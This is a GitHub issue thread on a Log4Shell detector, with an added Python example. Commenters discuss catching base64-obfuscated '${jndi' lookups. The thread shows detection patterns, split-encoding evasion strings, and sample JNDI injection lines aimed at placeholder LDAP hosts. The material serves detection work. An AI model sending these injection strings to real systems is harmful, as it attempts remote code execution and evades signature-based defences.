Neo23x0/log4shell-detector

Add pattern '${base64:JHtqbmRp'

baonq-me opened this issue · 7 comments

I request to add the pattern ${base64:JHtqbmRp, which evaluates to ${jndi. I think with the current algorithm, the detector cannot detect these kinds of patterns.

Ref
https://github.com/SigmaHQ/sigma/blob/master/rules/web/web_cve_2021_44228_log4j_fields.yml#L40

Oh, yes - from my own rule ... thanks

Can I suggest that instead of looking for the string outright... a more foolproof way to handle the base64 is to actually do the decode. Because the issue is you can base64 encode any subset of the URI and combine it with other chars. So to handle this you could find all of the ${base64:} instances first, decode them, then run back through the detection.

Could you explain why we would need more coverage with an example?
Which use isn't covered by ${base64:JHtqbmRp?

You can do this as an example.. encode only "di"

${jn${base64:JZGk}://}

or this ... encode just the "d"

${jn${base64:ZA}i://}

or... any number of combinations of things that are part of the string

I have a PR #25 that adds the decoding
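The decode-then-detect approach proposed above (find every `${base64:...}` instance, decode it, then re-run the `${jndi` match) as a worked example. This is added illustration for the thread, not code from the log4shell-detector project or from PR #25; the padding tolerance, the case-insensitive regex, the `MAX_LAYERS` bound and the sample log lines are all constructed assumptions. It handles the split-encoding cases shown in the comment (`ZA` for "d", `ZGk` for "di") as well as the fully encoded marker and one lookup nested inside another.

```python
"""Resolve ${base64:...} lookups before matching so that partially or fully
base64-encoded ${jndi strings are still caught. Added example; not project code."""
import base64
import binascii
import re
from typing import List, Optional, NamedTuple, Tuple

# One ${base64:<payload>} lookup. Restricting the payload to the base64 alphabet
# means a token that is not base64 at all never matches and is left untouched.
BASE64_LOOKUP = re.compile(r"\$\{base64:([A-Za-z0-9+/=]*)\}", re.IGNORECASE)

# The marker the detector looks for once the obfuscation layer is removed.
JNDI_MARKER = "${jndi"

# Upper bound on nested decode passes (assumed value, guards against loops).
MAX_LAYERS = 8


class Verdict(NamedTuple):
    matched: bool   # True when ${jndi appears after decoding
    decoded: str    # the line with every decodable base64 lookup resolved
    layers: int     # number of decode passes that changed the line


def decode_b64_lenient(payload: str) -> Optional[str]:
    """Decode a base64 chunk that may lack padding, e.g. 'ZA' for 'd'.

    Returns None when the chunk cannot be valid base64 or does not decode to
    text; the caller then leaves the original token in place rather than fail.
    """
    if len(payload) % 4 == 1:           # no valid base64 string has this length
        return None
    padded = payload + "=" * (-len(payload) % 4)
    try:
        return base64.b64decode(padded).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def _resolve_match(match: "re.Match") -> str:
    decoded = decode_b64_lenient(match.group(1))
    return match.group(0) if decoded is None else decoded


def deobfuscate(text: str, max_layers: int = MAX_LAYERS) -> Tuple[str, int]:
    """Replace each decodable ${base64:...} with its plaintext, repeating while
    the text keeps changing, since decoded content may itself contain lookups."""
    layers = 0
    while layers < max_layers:
        resolved = BASE64_LOOKUP.sub(_resolve_match, text)
        if resolved == text:
            break
        text = resolved
        layers += 1
    return text, layers


def detect(line: str) -> Verdict:
    """Decode first, then apply the plain ${jndi match to the result."""
    decoded, layers = deobfuscate(line)
    return Verdict(JNDI_MARKER in decoded.lower(), decoded, layers)


def scan_lines(lines: List[str]) -> List[int]:
    """Indexes of the lines that match after deobfuscation."""
    return [i for i, line in enumerate(lines) if detect(line).matched]


def encode_lookup(plaintext: str) -> str:
    """Wrap text in a ${base64:...} lookup; used only to build sample input."""
    return "${base64:" + base64.b64encode(plaintext.encode()).decode() + "}"


# Constructed sample log lines (hosts are placeholders, not real indicators).
SAMPLE_LOG = [
    'GET /index.html HTTP/1.1 "Mozilla/5.0"',
    'GET / HTTP/1.1 "${jn${base64:ZA}i://ldap.example/a}"',       # "d" encoded
    'GET / HTTP/1.1 "${base64:JHtqbmRp}:ldap://ldap.example/a}"',  # "${jndi" encoded
    'GET /search?q=${base64:aGVsbG8=} HTTP/1.1',                   # benign: "hello"
]

if __name__ == "__main__":
    for idx in scan_lines(SAMPLE_LOG):
        print(f"line {idx} matched after decoding: {detect(SAMPLE_LOG[idx]).decoded}")
```

The loop stops as soon as a pass changes nothing, so an undecodable token (for example a one-character payload) is left in the line and cannot cause an endless rescan; `MAX_LAYERS` is a second guard against a payload that keeps producing new lookups.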

Ah, I see - yes, good to cover that as well

FYI, base64 isn't actually in a release yet, just in master, so these payloads shouldn’t work unless the target has chosen to add the lookup themselves.